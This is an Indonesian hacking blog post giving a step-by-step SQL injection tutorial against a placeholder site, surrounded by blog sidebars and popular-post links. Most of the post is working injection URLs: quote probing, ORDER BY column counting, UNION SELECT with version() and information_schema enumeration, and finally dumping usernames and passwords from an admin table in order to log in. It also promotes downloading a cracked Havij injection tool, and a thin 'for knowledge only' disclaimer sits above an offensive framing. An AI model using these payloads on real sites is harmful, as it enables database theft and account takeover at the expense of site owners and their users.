“You have an error in your SQL syntax.You have an error in your SQL syntax;
check the
manual that corresponds to your MySQL server version for the right syntax to
use near ”’
at line 1″ Dan masih banyak lagi macamnya.
Disini kita akan menggunakan perintah order by
Misalkan errornya disini…
Langsung aja kita liat isinya…
—————————————————
begitulah yang dituliskan disana.
anda masih belum paham tentang apa SQL injection ?
tenang silahkan anda download file dokumen dibawah ini tentang SQL
injection step by step.
CARITA YAAA :::> CARI DULU BARU TAU....!!!
Categories
- Download Blogger Templats (11)
- INSTALASI (6)
- Koleksi Lirik Lagu (8)
- Macam-macam penyakit dan cara mengatasinya (13)
- Software (7)
- elektronika (6)
- hacker and cracker (14)
- jaringan (11)
- service handphone (15)
- tips-trick (32)
Arsip ke
Munawir Usman. Diberdayakan oleh Blogger.
petak artikel
Harap
dicatat bahwa penulis tidak bertanggung jawab atas segala bentuk efek dari
artikel ini, tujuannya hanya untuk pengetahuan saja, jadi silahkan gunakan
untuk kebaikan dan keamanan kalian masing2. Pertanyaan yang bersifat “Merusak”
tidak akan ditanggapi.
Cara
ngehacking web atau biasa disebut web attack sangat banyak caranya, salah
satunya dengan cara SQL injection.
Apa itu SQL
injection ?
SQL
injection terjadi ketika attacker bisa meng-insert beberapa SQL statement ke
‘query’ dengan cara manipulasi data input ke applikasi tsb.
ini salah
satu cara melakukan tekhnik SQL injection, cara ini saya copas dari http://jasakom.com oleh seorang penulis sebut saja
cruz3N
oke, mari
kita simak bersama-sama.
1. Pertama
kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini
adalah
http://www.target.com/berita.php?id=100
2. Tambahkan
karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah
ada pesan error.
Contoh :
http://www.target.com/berita.php?id=100'
atau
http://www.target.com/berita.php?id=-100
4. Maka akan
muncul pesan error…
5. Next step
adalah mencari dan menghitung jumlah table yang ada dalam databasenya…
Contoh :
http://www.target.com/berita.php?id=100+order+by+1/*
Hohoho…apalagi
itu “/*” ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake
“–”. Terserah aja…
Kalo “+”
sebagai penghubung perintah…
6. Nah sampe
sini langsung dah nyobain satu2…
http://www.target.com/berita.php?id=100+order+by+1/* (gak ada
error)
http://www.target.com/berita.php?id=100+order+by+2/* (gak ada
juga)
http://www.target.com/berita.php?id=100+order+by+3/* (capek
dah)
http://www.target.com/berita.php?id=100+order+by+4/* (jangan
nyerah)
Sampai
muncul error…
http://www.target.com/berita.php?id=100+order+by+10/*
Berarti yang
kita ambil adalah “9″
http://www.target.com/berita.php?id=100+order+by+9/*
7. Untuk
mengetahui berapa angka yang show sekarang kita pake UNION
Contoh :
http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*
Trus
perhatikan angka berapa yang keluar (Kayak togel aja… ;p)
8. Misalnya
angka hoki yang keluar adalah “3″ maka yang bisa akan kita lakukan adalah
mengecek versi berapa mysql yang dipake dengan perintah “version()” atau
“@@version”
http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*
Atau
http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*
9. Nah kalo
versinya 5 langsung aja pake perintah “information_schema” untuk melihat tabel
dan kolom yang ada pada database…
Contoh :
http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*
Nah katanya
kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL.
Tapi waktu itu gua gak pake keliatan kok tabelnya…Apa gua salah? Mungkin tapi
sekarang yang gua mau jelaskan adalah VERSI DAN PENGALAMAN GUA. Mungkin agak
lain…ya maklum lah baru belajar…Hehehe…
Misalnya
yang lo liat adalah table “admin”
Nah sekarang
kita liat-liat dulu kolomnya dengan mengganti aja kata “table”-nya…
Contoh:
http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*
Misalnya
kolom yang keluar adalah “password” dan “username”
Contoh :
http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*
dan
http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*
Bisa diliat
dah username ama passwordnya…Tinggal login…Cari yang asik terus…Terserah Anda…
oke selamat
mencoba. yang terpenting jangan dilakukan di web teman anda ataupun di website
Lokal.
referensi :
http://jasakom.com
http://ezine.echo.or.id
http://cruzenaldo.co.cc
http://students.ee.itb.ac.id
Catatan: Cara otomatis dengan memakai
software bisa juga dilakukan, selengkapnya lihat artikel berikut ini
Atau mau
mencoba tool yang baru saya dapatkan? namanya Havij. Adapun fitur2nya:
Download HAVIJ
Label :
hacking web • havij cracked • sql injection •
Langganan:
Posting Komentar (Atom)
Popular Posts
-
Adakalanya kita sering harus online dan bekerja di sudut-sudut ruangan atau taman, biasanya hal ini dilakukan pada saat is...
-
INSTALASI JARINGAN HOTSPOT Adapun peralatan dan syarat yang harus kita penuhi antara lain: Router/AP Wi-Fi (Referensi hardware...
-
Author: Munawir Usman Solusi untuk mencegah sekaligus mengobati penyakit kanker darah atau leukemia dengan ...
-
Apakah Anda curiga bahwa seseorang secara sengaja ataupun tidak sengaja menggunakan koneksi jaringan wifi Anda? Mungk...
-
Konsep dasar struktur jaringan Billing Hotspot Software Billing Hotspot harus di install di komputer dengan Operating Sistem Linux, seda...
-
Virus Komputer memang sangat menyebalkan terutama bagi anda yang kesehariannya bergelut dengan komputer. Karena Virus tersebu...
-
Ada kalanya kita marah dengan tingkah laku seorang teman kita di facebook yang suka komentar gak jelas, ngirim aplikasi gak jel...
-
Bagaimana cara mendapatkan kembali akun Facebook kamu yang di hack?. Nah, bagi orang yang punya akun Facebook dibobol password dan email-n...
-
Berikut ini adalah langkah-langkah perakitan CPU. 1. Letakkan motherboard pada tempat yang datar dan jangan lupa beri alas dengan per...
